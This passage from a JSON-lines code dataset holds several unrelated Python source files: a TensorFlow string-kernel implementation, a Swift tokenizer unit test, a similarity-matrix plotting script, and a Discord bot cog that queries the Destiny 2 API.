tf.reshape(k[X1_shape*X2_shape:X1_shape*X2_shape+X1_shape],(-1,))\n X2_diag_Ks = tf.reshape(k[-X2_shape:],(-1,))\n k = k[0:X1_shape*X2_shape]\n k_results = tf.transpose(tf.reshape(k,[X2_shape,X1_shape]))\n # normalise\n norm = tf.tensordot(X_diag_Ks, X2_diag_Ks,axes=0)\n k_results = tf.divide(k_results, tf.sqrt(norm))\n\n\n return k_results\n\n\n def _precalc(self):\n r\"\"\"\n Update stored kernel params (incase they have changed)\n and precalc D and dD_dgap as required for kernel calcs\n following notation from Beck (2017)\n \"\"\"\n self.decay = self.decay_param.numpy()\n self.decay_unconstrained = self.decay_param.unconstrained_variable.numpy()\n\n tril = tf.linalg.band_part(tf.ones((self.maxlen,self.maxlen),dtype=tf.float64), -1, 0)\n # get upper triangle matrix of increasing intergers\n values = tf.TensorArray(tf.int32, size= self.maxlen)\n for i in tf.range(self.maxlen):\n values = values.write(i,tf.range(-i-1,self.maxlen-1-i)) \n power = tf.cast(values.stack(),tf.float64)\n values.close()\n power = tf.linalg.band_part(power, 0, -1) - tf.linalg.band_part(power, 0, 0) + tril\n tril = tf.transpose(tf.linalg.band_part(tf.ones((self.maxlen,self.maxlen),dtype=tf.float64), -1, 0))-tf.eye(self.maxlen,dtype=tf.float64)\n gaps = tf.fill([self.maxlen, self.maxlen],self.decay)\n \n self.D = tf.pow(gaps*tril, power)\n self.dD_dgap = tf.pow((tril * gaps), (power - 1.0)) * tril * power\n\n\n\n @tf.custom_gradient\n def kernel_calc(self,S):\n\n # fake computations to ensure we take the custom gradients for these two params\n a = tf.square(self.decay_param)\n\n if self.symmetric:\n k, dk_dgap = tf.stop_gradient(self.kernel_calc_with_grads(S))\n else:\n k = tf.stop_gradient(self.kernel_calc_without_grads(S))\n\n\n def grad(dy, variables=None):\n # get gradients of unconstrained params\n grads= {}\n if self.symmetric:\n grads['decay:0'] = tf.reduce_sum(tf.multiply(dy,dk_dgap*tf.math.exp(self.logistic.forward_log_det_jacobian(self.decay_unconstrained,0))))\n gradient = [grads[v.name] for v in variables]\n else:\n gradient = [None for v in variables]\n return ((None),gradient)\n\n\n return k, grad\n\n def kernel_calc_without_grads(self,S):\n\n # store squared match coef for easier calc later\n match_sq = tf.square(self.decay)\n\n\n # calc subkernels for each subsequence length (See Moss et al. 2020 for notation)\n Kp = tf.TensorArray(tf.float64,size=self.max_subsequence_length,clear_after_read=False)\n\n # fill in first entries\n Kp = Kp.write(0, tf.ones(shape=tf.stack([tf.shape(S)[0], self.maxlen,self.maxlen]), dtype=tf.float64))\n\n # calculate dynamic programs\n for i in tf.range(self.max_subsequence_length-1):\n Kp_temp = tf.multiply(S, Kp.read(i))\n Kp_temp0 = match_sq * Kp_temp\n Kp_temp1 = tf.matmul(Kp_temp0,self.D)\n Kp_temp2 = tf.matmul(self.D,Kp_temp1,transpose_a=True)\n Kp = Kp.write(i+1,Kp_temp2)\n\n # Final calculation. We gather all Kps \n Kp_stacked = Kp.stack()\n Kp.close()\n\n # combine and get overall kernel\n aux = tf.multiply(S, Kp_stacked)\n aux = tf.reduce_sum(aux, -1)\n sum2 = tf.reduce_sum(aux, -1)\n Ki = sum2 * match_sq\n k = tf.linalg.matvec(tf.transpose(Ki),self.order_coefs)\n\n return k\n\n \n def kernel_calc_with_grads(self,S):\n # store squared match coef for easier calc later\n match_sq = tf.square(self.decay)\n # calc subkernels for each subsequence length (See Moss et al. 2020 for notation)\n Kp = tf.TensorArray(tf.float64,size=self.max_subsequence_length,clear_after_read=False)\n dKp_dgap = tf.TensorArray(tf.float64, size=self.max_subsequence_length, clear_after_read=False)\n\n # fill in first entries\n Kp = Kp.write(0, tf.ones(shape=tf.stack([tf.shape(S)[0], self.maxlen,self.maxlen]), dtype=tf.float64))\n dKp_dgap = dKp_dgap.write(0, tf.zeros(shape=tf.stack([tf.shape(S)[0], self.maxlen,self.maxlen]), dtype=tf.float64))\n\n # calculate dynamic programs\n for i in tf.range(self.max_subsequence_length-1):\n Kp_temp = tf.multiply(S, Kp.read(i))\n Kp_temp0 = match_sq * Kp_temp\n Kp_temp1 = tf.matmul(Kp_temp0,self.D)\n Kp_temp2 = tf.matmul(self.D,Kp_temp1,transpose_a=True)\n Kp = Kp.write(i+1,Kp_temp2)\n\n dKp_dgap_temp_1 = tf.matmul(self.dD_dgap,Kp_temp1,transpose_a=True)\n dKp_dgap_temp_2 = tf.multiply(S, dKp_dgap.read(i))\n dKp_dgap_temp_2 = dKp_dgap_temp_2 * match_sq\n dKp_dgap_temp_2 = tf.matmul(dKp_dgap_temp_2,self.D)\n dKp_dgap_temp_2 = dKp_dgap_temp_2 + tf.matmul(Kp_temp0,self.dD_dgap)\n dKp_dgap_temp_2 = tf.matmul(self.D,dKp_dgap_temp_2,transpose_a=True)\n dKp_dgap = dKp_dgap.write(i+1,dKp_dgap_temp_1 + dKp_dgap_temp_2)\n\n\n\n # Final calculation. We gather all Kps \n Kp_stacked = Kp.stack()\n Kp.close()\n dKp_dgap_stacked = dKp_dgap.stack()\n dKp_dgap.close()\n\n\n # combine and get overall kernel\n\n # get k\n aux = tf.multiply(S, Kp_stacked)\n aux = tf.reduce_sum(aux, -1)\n sum2 = tf.reduce_sum(aux, -1)\n Ki = sum2 * match_sq\n k = tf.linalg.matvec(tf.transpose(Ki),self.order_coefs)\n\n # get gap decay grads\n temp = tf.multiply(S, dKp_dgap_stacked)\n temp = tf.reduce_sum(temp, -1)\n temp = tf.reduce_sum(temp, -1)\n temp = temp * match_sq\n dk_dgap = tf.linalg.matvec(tf.transpose(temp),self.order_coefs)\n\n\n return k, dk_dgap\n\n"} {"ext": "py", "sha": "1a2f0cb42c5e281612c2dd86f9dc9461dd6f0c31", "content": "\"\"\"\nCompat. layer between LWR and Galaxy.\n\"\"\"\n"} {"ext": "py", "sha": "1a2f0d7d97d9d67d1ba8cf782e6bc6fb923479de", "content": "import unittest\nimport swift_idl as IDL\n\ntest_structure = {\n \"key.kind\" : \"source.lang.swift.decl.struct\",\n \"key.offset\" : 19,\n \"key.nameoffset\" : 26,\n \"key.namelength\" : 3,\n \"key.inheritedtypes\" : [\n {\n \"key.name\" : \"JSONDecodable\"\n }\n ],\n \"key.bodylength\" : 110,\n \"key.accessibility\" : \"source.lang.swift.accessibility.internal\",\n \"key.substructure\" : [\n {\n \"key.kind\" : \"source.lang.swift.decl.var.instance\",\n \"key.offset\" : 72,\n \"key.attributes\" : [\n {\n \"key.attribute\" : \"source.decl.attribute.__raw_doc_comment\"\n }\n ],\n \"key.nameoffset\" : 76,\n \"key.namelength\" : 2,\n \"key.length\" : 15,\n \"key.accessibility\" : \"source.lang.swift.accessibility.internal\",\n \"key.substructure\" : [\n\n ],\n \"key.typename\" : \"Int\",\n \"key.name\" : \"id\"\n },\n {\n \"key.kind\" : \"source.lang.swift.decl.var.instance\",\n \"key.offset\" : 92,\n \"key.nameoffset\" : 96,\n \"key.namelength\" : 5,\n \"key.length\" : 17,\n \"key.accessibility\" : \"source.lang.swift.accessibility.internal\",\n \"key.substructure\" : [\n\n ],\n \"key.typename\" : \"String\",\n \"key.name\" : \"query\"\n },\n {\n \"key.kind\" : \"source.lang.swift.decl.var.instance\",\n \"key.offset\" : 126,\n \"key.attributes\" : [\n {\n \"key.attribute\" : \"source.decl.attribute.__raw_doc_comment\"\n }\n ],\n \"key.nameoffset\" : 130,\n \"key.namelength\" : 1,\n \"key.length\" : 13,\n \"key.accessibility\" : \"source.lang.swift.accessibility.internal\",\n \"key.substructure\" : [\n\n ],\n \"key.typename\" : \"String\",\n \"key.name\" : \"z\"\n }\n ],\n \"key.name\" : \"Foo\",\n \"key.length\" : 138,\n \"key.bodyoffset\" : 46\n}\n\ntest_syntax = [\n { \"offset\" : 0, \"length\" : 6, \"type\" : \"source.lang.swift.syntaxtype.keyword\" },\n { \"offset\" : 7, \"length\" : 10, \"type\" : \"source.lang.swift.syntaxtype.identifier\" },\n { \"offset\" : 19, \"length\" : 6, \"type\" : \"source.lang.swift.syntaxtype.keyword\" },\n { \"offset\" : 26, \"length\" : 3, \"type\" : \"source.lang.swift.syntaxtype.identifier\" },\n { \"offset\" : 31, \"length\" : 13, \"type\" : \"source.lang.swift.syntaxtype.typeidentifier\" },\n { \"offset\" : 47, \"length\" : 21, \"type\" : \"source.lang.swift.syntaxtype.comment\" },\n { \"offset\" : 72, \"length\" : 3, \"type\" : \"source.lang.swift.syntaxtype.keyword\" },\n { \"offset\" : 76, \"length\" : 2, \"type\" : \"source.lang.swift.syntaxtype.identifier\" },\n { \"offset\" : 80, \"length\" : 3, \"type\" : \"source.lang.swift.syntaxtype.typeidentifier\" },\n { \"offset\" : 86, \"length\" : 1, \"type\" : \"source.lang.swift.syntaxtype.number\" },\n { \"offset\" : 92, \"length\" : 3, \"type\" : \"source.lang.swift.syntaxtype.keyword\" },\n { \"offset\" : 96, \"length\" : 5, \"type\" : \"source.lang.swift.syntaxtype.identifier\" },\n { \"offset\" : 103, \"length\" : 6, \"type\" : \"source.lang.swift.syntaxtype.typeidentifier\" },\n { \"offset\" : 110, \"length\" : 12, \"type\" : \"source.lang.swift.syntaxtype.comment\" },\n { \"offset\" : 126, \"length\" : 3, \"type\" : \"source.lang.swift.syntaxtype.keyword\" },\n { \"offset\" : 130, \"length\" : 1, \"type\" : \"source.lang.swift.syntaxtype.identifier\" },\n { \"offset\" : 133, \"length\" : 6, \"type\" : \"source.lang.swift.syntaxtype.typeidentifier\" },\n { \"offset\" : 144, \"length\" : 12, \"type\" : \"source.lang.swift.syntaxtype.comment\" }\n]\n\ntest_source = '''import Foundation\n\nstruct Foo: JSONDecodable { // sample:\"foo,,bar\"\n let id: Int = 3\n let query: String // json:\"q\"\n let z: String // json:\"-\"\n}\n'''\n\n\nclass SampleStructTest(unittest.TestCase):\n def test_getSwiftTokens(self):\n tk = IDL.getSwiftTokens(test_syntax, test_source)\n self.assertEqual('import', tk[0].content)\n self.assertEqual(1, tk[0].line)\n self.assertEqual('source.lang.swift.syntaxtype.keyword', tk[0].tokenType)\n\n self.assertEqual('}\\n', tk[-1].content)\n self.assertEqual(7, tk[-1].line)\n self.assertEqual('omittedtoken', tk[-1].tokenType)\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a2f0e73329d5f6f22c7b9c749947d10b973a0fe", "content": "from os import getcwd\r\nimport sys\r\n\r\nsys.path.append(getcwd() + '/..') # Add src/ dir to import path\r\nimport traceback\r\nimport logging\r\nfrom os.path import join\r\nfrom itertools import combinations\r\n\r\nimport networkx as nx\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\nimport libs.osLib as ol\r\n\r\n\r\ndef removeDiagonal(A):\r\n m = A.shape[0]\r\n strided = np.lib.stride_tricks.as_strided\r\n s0,s1 = A.strides\r\n return strided(A.ravel()[1:], shape=(m-1, m), strides=(s0+s1, s1)).reshape(m, -1)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n root = logging.getLogger()\r\n root.setLevel(logging.DEBUG)\r\n\r\n baseDir, outputDir = '../../data/adjacencyMatrices', '../../data/plots'\r\n loadNodeMappings, loadAdjacencies = True, False\r\n\r\n numClusters = 2\r\n\r\n classMapping = {\r\n 'time': 'T',\r\n 'content': 'C',\r\n 'tag': 'G',\r\n 'location': 'L',\r\n }\r\n\r\n try:\r\n # metapaths = [['time', 'content', 'time'], ['tag', 'content', 'tag'], ['location', 'content', 'location'] ] # ['time', 'content', 'time'] # #\r\n metapaths = [['time', 'content', 'time']]\r\n metapaths = [[classMapping[t] for t in metapath] for metapath in metapaths]\r\n\r\n for metapath in metapaths:\r\n nodeMapping = ol.loadPickle(join(baseDir, f'nodeMapping.pickle'))\r\n\r\n # PathSim load\r\n similarityM = ol.loadSparce(join(baseDir, f'similarity-{\"\".join(metapath)}.npz')).toarray()\r\n\r\n # Sclump load\r\n # similarityM = ol.loadNumpy(join(baseDir, f'SClump-similarity.npy'))\r\n\r\n similarityM = removeDiagonal(similarityM) # Carefull here - we're removing the relation with itself but breaking the mapping from nodeMapping\r\n\r\n # Remove all zeros\r\n print(f'Orig shape: {similarityM.shape}')\r\n similarityM = similarityM[~np.all(similarityM == 0, axis=1)]\r\n similarityM = similarityM[:, ~np.all(similarityM == 0, axis=0)]\r\n print(f'Without zeros shape: {similarityM.shape}')\r\n\r\n # Plot simple value histogram\r\n flattenSim = pd.Series(similarityM.flatten())\r\n g = sns.distplot(flattenSim, kde=False, bins=10)\r\n g.set_yscale('log')\r\n plt.savefig(join(outputDir, f'similarityValueDistribution-{\"\".join(metapath)}.png'))\r\n plt.title('Value count in Similarity Matrix')\r\n print(similarityM.max())\r\n\r\n # Count non-zeros per row\r\n rowCountNonZero = np.count_nonzero(similarityM, axis=1)\r\n\r\n # Count max value per row\r\n rowCountMax = np.amax(similarityM, 1)\r\n\r\n # Count min value (that's not a zero) per row\r\n rowCountMinNonZero = np.where(similarityM > 0, similarityM, similarityM.max()).min(1)\r\n\r\n # Count mean value (that's not a zero) per row\r\n rowCountMeanNonZero = np.true_divide(similarityM.sum(1), (similarityM!=0).sum(1))\r\n\r\n plotDf = None\r\n for k, x in {\r\n 'Non zeros per row': rowCountNonZero,\r\n 'Max per row': rowCountMax,\r\n 'Mean per row (no zeros)': rowCountMeanNonZero,\r\n 'Min per row (no zeros)': rowCountMinNonZero,\r\n }.items():\r\n auxDf = pd.Series(x, name='Count').to_frame()\r\n auxDf['Measure'] = k\r\n plotDf = auxDf if plotDf is None else pd.concat([plotDf, auxDf], ignore_index=False)\r\n\r\n # Make boxplot\r\n fig, ax = plt.subplots(figsize=(15, 15))\r\n g = sns.boxplot(ax=ax, data=plotDf, x='Measure', y='Count', palette=\"Set2\", showfliers=True, showmeans=True)\r\n g.set_yscale('log')\r\n g.set_yticklabels(g.get_yticks(), size=16)\r\n # g.set_xticklabels(g.get_xticks(), size=16)\r\n plt.savefig(join(outputDir, f'statsPerRow-log-{\"\".join(metapath)}.png'))\r\n plt.close()\r\n\r\n # Make boxplot\r\n fig, ax = plt.subplots(figsize=(15, 15))\r\n g = sns.boxplot(ax=ax, data=plotDf, x='Measure', y='Count', palette=\"Set2\", showfliers=False, showmeans=True)\r\n g.set_yticklabels(g.get_yticks(), size=16)\r\n # g.set_xticklabels(g.get_xticks(), size=16)\r\n plt.savefig(join(outputDir, f'statsPerRow-{\"\".join(metapath)}.png'))\r\n plt.close()\r\n\r\n # Make violin plots\r\n fig = plt.figure(figsize=(12, 12))\r\n gs = fig.add_gridspec(3, 2)\r\n\r\n ax = fig.add_subplot(gs[0, 0])\r\n sns.violinplot(data=similarityM.flatten())\r\n ax.set_xlabel(\"Similarity as is\")\r\n\r\n ax = fig.add_subplot(gs[0, 1])\r\n sns.violinplot(data=rowCountNonZero)\r\n ax.set_xlabel(\"Non zeros per row\")\r\n\r\n ax = fig.add_subplot(gs[1, 0])\r\n sns.violinplot(rowCountMeanNonZero)\r\n ax.set_xlabel(\"Mean per row (no zeros)\")\r\n\r\n ax = fig.add_subplot(gs[1, 1])\r\n sns.violinplot(rowCountMinNonZero)\r\n ax.set_xlabel(\"Min per row (no zeros)\")\r\n\r\n ax = fig.add_subplot(gs[2, 0])\r\n sns.violinplot(data=rowCountMax)\r\n ax.set_xlabel(\"Max per row\")\r\n\r\n fig.tight_layout()\r\n plt.savefig(join(outputDir, f'statsViolinPerRow-{\"\".join(metapath)}.png'))\r\n plt.close()\r\n\r\n # Plot as matrix\r\n \"\"\"\r\n fig = plt.figure(figsize=(15, 15))\r\n ax = plt.axes()\r\n plt.spy(similarityM, precision=0.1, marker='.', markersize=0.05)\r\n plt.savefig(join(outputDir, f'similarityMatrixPlot-{\"\".join(metapath)}.png'))\r\n plt.close()\r\n \"\"\"\r\n\r\n\r\n\r\n # Select top k most similiar or wtv\r\n\r\n # Pick their similarity vectors\r\n\r\n # Plot them\r\n\r\n except Exception as ex:\r\n print(traceback.format_exc())"} {"ext": "py", "sha": "1a2f0e93aaa88f132ac65f9112e7d1e015d40235", "content": "import asyncio\nimport datetime\nimport logging\nimport json\nimport functools\nimport re\nimport csv\nfrom io import StringIO, BytesIO\nfrom pathlib import Path\nfrom tabulate import tabulate\nfrom typing import List, Literal, Optional, Union\n\nimport discord\nfrom redbot.core import Config, checks, commands\nfrom redbot.core.i18n import Translator, cog_i18n\nfrom redbot.core.utils.chat_formatting import pagify, humanize_timedelta, humanize_list, box\nfrom redbot.core.utils.menus import start_adding_reactions\nfrom redbot.core.utils.predicates import ReactionPredicate\n\nfrom .api import DestinyAPI\nfrom .converter import DestinyActivity, StatsPage, SearchInfo, DestinyEververseItemType\nfrom .errors import Destiny2APIError, Destiny2MissingManifest\nfrom .menus import BaseMenu, BasePages\n\nDEV_BOTS = [552261846951002112]\n# If you want parsing the manifest data to be easier add your\n# bots ID to this list otherwise this should help performance\n# on bots that are just running the cog like normal\n\nBASE_URL = \"https://www.bungie.net/Platform\"\nIMAGE_URL = \"https://www.bungie.net\"\nAUTH_URL = \"https://www.bungie.net/en/oauth/authorize\"\nTOKEN_URL = \"https://www.bungie.net/platform/app/oauth/token/\"\n_ = Translator(\"Destiny\", __file__)\nlog = logging.getLogger(\"red.trusty-cogs.Destiny\")\n\n\n@cog_i18n(_)\nclass Destiny(DestinyAPI, commands.Cog):\n \"\"\"\n Get information from the Destiny 2 API\n \"\"\"\n\n __version__ = \"1.5.5\"\n __author__ = \"TrustyJAID\"\n\n def __init__(self, bot):\n self.bot = bot\n default_global = {\n \"api_token\": {\"api_key\": \"\", \"client_id\": \"\", \"client_secret\": \"\"},\n \"manifest_version\": \"\",\n }\n default_user = {\"oauth\": {}, \"account\": {}}\n self.config = Config.get_conf(self, 35689771456)\n self.config.register_global(**default_global)\n self.config.register_user(**default_user)\n self.config.register_guild(clan_id=None)\n self.throttle: float = 0\n\n def format_help_for_context(self, ctx: commands.Context) -> str:\n \"\"\"\n Thanks Sinbad!\n \"\"\"\n pre_processed = super().format_help_for_context(ctx)\n return f\"{pre_processed}\\n\\nCog Version: {self.__version__}\"\n\n async def red_delete_data_for_user(\n self,\n *,\n requester: Literal[\"discord_deleted_user\", \"owner\", \"user\", \"user_strict\"],\n user_id: int,\n ):\n \"\"\"\n Method for finding a user's data inside the cog and deleting it.\n \"\"\"\n await self.config.user_from_id(user_id).clear()\n\n @commands.group()\n async def destiny(self, ctx: commands.Context) -> None:\n \"\"\"Get information from the Destiny 2 API\"\"\"\n pass\n\n @destiny.command()\n async def forgetme(self, ctx: commands.Context) -> None:\n \"\"\"\n Remove your authorization to the destiny API on the bot\n \"\"\"\n await self.red_delete_data_for_user(requester=\"user\", user_id=ctx.author.id)\n await ctx.send(_(\"Your authorization has been reset.\"))\n\n @destiny.group(aliases=[\"s\"])\n async def search(self, ctx: commands.Context) -> None:\n \"\"\"\n Search for a destiny item, vendor, record, etc.\n \"\"\"\n pass\n\n async def get_weapon_possible_perks(self, weapon: dict) -> dict:\n perks = {}\n slot_counter = 1\n count = 2\n for socket in weapon[\"sockets\"][\"socketEntries\"]:\n if socket[\"singleInitialItemHash\"] in [\n 4248210736,\n 2323986101,\n 0,\n 2285418970,\n 1282012138,\n 2993594586,\n ]:\n continue\n if socket[\"socketTypeHash\"] in [2218962841, 1282012138, 1456031260]:\n continue\n if \"randomizedPlugSetHash\" in socket:\n pool = (\n await self.get_definition(\n \"DestinyPlugSetDefinition\", [socket[\"randomizedPlugSetHash\"]]\n )\n )[str(socket[\"randomizedPlugSetHash\"])]\n pool_perks = [v[\"plugItemHash\"] for v in pool[\"reusablePlugItems\"]]\n all_perks = await self.get_definition(\n \"DestinyInventoryItemLiteDefinition\", pool_perks\n )\n try:\n # https://stackoverflow.com/questions/44914727/get-first-and-second-values-in-dictionary-in-cpython-3-6\n it = iter(all_perks.values())\n key_hash = next(it)[\"itemCategoryHashes\"][0]\n key_data = (\n await self.get_definition(\"DestinyItemCategoryDefinition\", [key_hash])\n )[str(key_hash)]\n key = key_data[\"displayProperties\"][\"name\"]\n if key in perks:\n key = f\"{key} {count}\"\n count += 1\n except IndexError:\n key = _(\"Perk {count}\").format(count=slot_counter)\n perks[key] = \"\\n\".join(\n [p[\"displayProperties\"][\"name\"] for h, p in all_perks.items()]\n )\n slot_counter += 1\n continue\n if \"reusablePlugSetHash\" in socket:\n pool = (\n await self.get_definition(\n \"DestinyPlugSetDefinition\", [socket[\"reusablePlugSetHash\"]]\n )\n )[str(socket[\"reusablePlugSetHash\"])]\n pool_perks = [v[\"plugItemHash\"] for v in pool[\"reusablePlugItems\"]]\n all_perks = await self.get_definition(\n \"DestinyInventoryItemLiteDefinition\", pool_perks\n )\n try:\n it = iter(all_perks.values())\n key_hash = next(it)[\"itemCategoryHashes\"][0]\n key_data = (\n await self.get_definition(\"DestinyItemCategoryDefinition\", [key_hash])\n )[str(key_hash)]\n key = key_data[\"displayProperties\"][\"name\"]\n if key in perks:\n key = f\"{key} {count}\"\n count += 1\n except IndexError:\n key = _(\"Perk {count}\").format(count=slot_counter)\n perks[key] = \"\\n\".join(\n [p[\"displayProperties\"][\"name\"] for h, p in all_perks.items()]\n )\n slot_counter += 1\n continue\n perk_hash = socket[\"singleInitialItemHash\"]\n perk = (await self.get_definition(\"DestinyInventoryItemLiteDefinition\", [perk_hash]))[\n str(perk_hash)\n ]\n try:\n it = iter(all_perks.values())\n key_hash = next(it)[\"itemCategoryHashes\"][0]\n key_data = (\n await self.get_definition(\"DestinyItemCategoryDefinition\", [key_hash])\n )[str(key_hash)]\n key = key_data[0][\"displayProperties\"][\"name\"]\n if key in perks:\n key = f\"{key} {count}\"\n count += 1\n except (IndexError, KeyError):\n key = _(\"Perk {count}\").format(count=slot_counter)\n perks[key] = perk[\"displayProperties\"][\"name\"]\n slot_counter += 1\n return perks\n\n @search.command(aliases=[\"item\"])\n @commands.bot_has_permissions(embed_links=True)\n @commands.max_concurrency(1, commands.BucketType.default)\n async def items(\n self, ctx: commands.Context, details_or_lore: Optional[SearchInfo] = None, *, search: str\n ) -> None:\n \"\"\"\n Search for a specific item in Destiny 2\n\n `[details_or_lore]` signify what information to display for the item\n by default this command will show all available perks on weapons\n using `details`, `true`, or `stats` will show the weapons stat bars\n using `lore` here will instead display the weapons lore card instead if it exists.\n \"\"\"\n show_lore = True if details_or_lore is False else False\n if search.startswith(\"lore \"):\n search = search.replace(\"lore \", \"\")\n async with ctx.typing():\n try:\n items = await self.search_definition(\"DestinyInventoryItemDefinition\", search)\n except Destiny2MissingManifest as e:\n await ctx.send(e)\n return\n if not items:\n await ctx.send(_(\"`{search}` could not be found.\").format(search=search))\n return\n embeds = []\n # log.debug(items[0])\n for item_hash, item in items.items():\n if not (item[\"equippable\"]):\n continue\n embed = discord.Embed()\n description = item[\"flavorText\"] + \"\\n\\n\"\n damage_type = \"\"\n try:\n damage_data = (\n await self.get_definition(\n \"DestinyDamageTypeDefinition\", [item[\"defaultDamageTypeHash\"]]\n )\n )[str(item[\"defaultDamageTypeHash\"])]\n damage_type = damage_data[\"displayProperties\"][\"name\"]\n except KeyError:\n pass\n if item[\"itemType\"] in [3] and not show_lore:\n\n stats_str = \"\"\n rpm = \"\"\n recoil = \"\"\n magazine = \"\"\n for stat_hash, value in item[\"stats\"][\"stats\"].items():\n if stat_hash in [\"1935470627\", \"1480404414\", \"1885944937\"]:\n continue\n\n stat_info = (\n await self.get_definition(\"DestinyStatDefinition\", [stat_hash])\n )[str(stat_hash)]\n stat_name = stat_info[\"displayProperties\"][\"name\"]\n if not stat_name:\n continue\n prog = \"█\" * int(value[\"value\"] / 10)\n empty = \"░\" * int((100 - value[\"value\"]) / 10)\n bar = f\"{prog}{empty}\"\n if stat_hash == \"4284893193\":\n rpm = f\"{stat_name}: **{value['value']}**\\n\"\n continue\n if stat_hash == \"3871231066\":\n recoil = f\"{stat_name}: **{value['value']}**\\n\"\n continue\n if stat_hash == \"2715839340\":\n magazine = f\"{stat_name}: **{value['value']}**\\n\"\n continue\n if details_or_lore:\n stats_str += f\"{stat_name}: **{value['value']}** \\n{bar}\\n\"\n stats_str += rpm + recoil + magazine\n description += stats_str\n embed.description = description\n perks = await self.get_weapon_possible_perks(item)\n for key, value in perks.items():\n embed.add_field(name=key, value=value[:1024])\n if \"loreHash\" in item and (show_lore or item[\"itemType\"] in [2]):\n lore = (\n await self.get_definition(\"DestinyLoreDefinition\", [item[\"loreHash\"]])\n )[str(item[\"loreHash\"])]\n description += _(\"Lore: \\n\\n\") + lore[\"displayProperties\"][\"description\"]\n if len(description) > 2048:\n count = 0\n for page in pagify(description, page_length=1024):\n if count == 0:\n embed.description = page\n else:\n embed.add_field(name=_(\"Lore Continued\"), value=page)\n count += 1\n else:\n embed.description = description\n embed.title = damage_type + \" \" + item[\"itemTypeAndTierDisplayName\"]\n name = item[\"displayProperties\"][\"name\"]\n icon_url = IMAGE_URL + item[\"displayProperties\"][\"icon\"]\n embed.set_author(name=name, icon_url=icon_url)\n embed.set_thumbnail(url=icon_url)\n if item.get(\"screenshot\", False):\n embed.set_image(url=IMAGE_URL + item[\"screenshot\"])\n embeds.append(embed)\n await BaseMenu(\n source=BasePages(\n pages=embeds,\n ),\n delete_message_after=False,\n clear_reactions_after=True,\n timeout=60,\n cog=self,\n page_start=0,\n ).start(ctx=ctx)\n\n async def check_gilded_title(self, chars: dict, title: dict) -> bool:\n \"\"\"\n Checks a players records for a completed gilded title\n \"\"\"\n gilding_hash = title[\"titleInfo\"].get(\"gildingTrackingRecordHash\", None)\n records = chars[\"profileRecords\"][\"data\"][\"records\"]\n if str(gilding_hash) in records:\n for objective in records[str(gilding_hash)][\"objectives\"]:\n if objective[\"complete\"]:\n return True\n return False\n\n @destiny.command(name=\"joinme\")\n @commands.bot_has_permissions(embed_links=True)\n async def destiny_join_command(self, ctx: commands.Context) -> None:\n \"\"\"\n Get your Steam ID to give people to join your in-game fireteam\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n bungie_id = await self.config.user(ctx.author).oauth.membership_id()\n creds = await self.get_bnet_user(ctx.author, bungie_id)\n steam_id = \"\"\n for cred in creds:\n if \"credentialAsString\" in cred:\n steam_id = cred[\"credentialAsString\"]\n join_code = f\"\\n```py\\n/join {steam_id}\\n```\"\n msg = _(\n \"Use the following code in game to join {author}'s Fireteam:{join_code}\"\n ).format(author=ctx.author.display_name, join_code=join_code)\n join_code = f\"\\n```py\\n/join {steam_id}\\n```\"\n await ctx.send(msg)\n\n @destiny.group()\n @commands.bot_has_permissions(embed_links=True)\n async def clan(self, ctx: commands.Context) -> None:\n \"\"\"\n Clan settings\n \"\"\"\n return\n\n @clan.command(name=\"info\")\n @commands.bot_has_permissions(embed_links=True)\n async def show_clan_info(self, ctx: commands.Context, clan_id: Optional[str]):\n \"\"\"\n Display basic information about the clan set in this server\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n if clan_id:\n clan_re = re.compile(\n r\"(https:\\/\\/)?(www\\.)?bungie\\.net\\/.*(groupid=(\\d+))\", flags=re.I\n )\n clan_invite = clan_re.search(clan_id)\n if clan_invite:\n clan_id = clan_invite.group(4)\n else:\n clan_id = await self.config.guild(ctx.guild).clan_id()\n if not clan_id:\n return await ctx.send(\n _(\n \"No clan ID has been setup for this server. \"\n \"Use `{prefix}destiny clan set` to set one.\"\n ).format(prefix=ctx.clean_prefix)\n )\n try:\n clan_info = await self.get_clan_info(ctx.author, clan_id)\n embed = await self.make_clan_embed(clan_info)\n except Exception:\n log.exception(\"Error getting clan info\")\n return await ctx.send(\n _(\"I could not find any information about this servers clan.\")\n )\n else:\n await ctx.send(embed=embed)\n\n async def make_clan_embed(self, clan_info: dict) -> discord.Embed:\n clan_id = clan_info[\"detail\"][\"groupId\"]\n clan_name = clan_info[\"detail\"][\"name\"]\n clan_about = clan_info[\"detail\"][\"about\"]\n clan_motto = clan_info[\"detail\"][\"motto\"]\n clan_callsign = clan_info[\"detail\"][\"clanInfo\"][\"clanCallsign\"]\n clan_xp_data = clan_info[\"detail\"][\"clanInfo\"][\"d2ClanProgressions\"][\"584850370\"]\n weekly_progress = clan_xp_data[\"weeklyProgress\"]\n weekly_limit = clan_xp_data[\"weeklyLimit\"]\n level = clan_xp_data[\"level\"]\n level_cap = clan_xp_data[\"levelCap\"]\n members = clan_info[\"detail\"][\"memberCount\"]\n max_members = clan_info[\"detail\"][\"features\"][\"maximumMembers\"]\n clan_creation_date = datetime.datetime.strptime(\n clan_info[\"detail\"][\"creationDate\"], \"%Y-%m-%dT%H:%M:%S.%fZ\"\n )\n clan_create_str = clan_creation_date.strftime(\"%I:%M %p %Y-%m-%d\")\n clan_xp_str = _(\n \"Level: {level}/{level_cap}\\nWeekly Progress: \" \"{weekly_progress}/{weekly_limit}\"\n ).format(\n level=level,\n level_cap=level_cap,\n weekly_progress=weekly_progress,\n weekly_limit=weekly_limit,\n )\n\n join_link = f\"https://www.bungie.net/en/ClanV2?groupid={clan_id}\"\n embed = discord.Embed(\n title=f\"{clan_name} [{clan_callsign}]\", description=clan_about, url=join_link\n )\n embed.add_field(name=_(\"Motto\"), value=clan_motto, inline=False)\n embed.add_field(name=_(\"Clan XP\"), value=clan_xp_str)\n embed.add_field(name=_(\"Members\"), value=f\"{members}/{max_members}\")\n embed.add_field(name=_(\"Clan Founded\"), value=clan_create_str)\n return embed\n\n @clan.command(name=\"set\")\n @commands.bot_has_permissions(embed_links=True)\n @commands.admin_or_permissions(manage_guild=True)\n async def 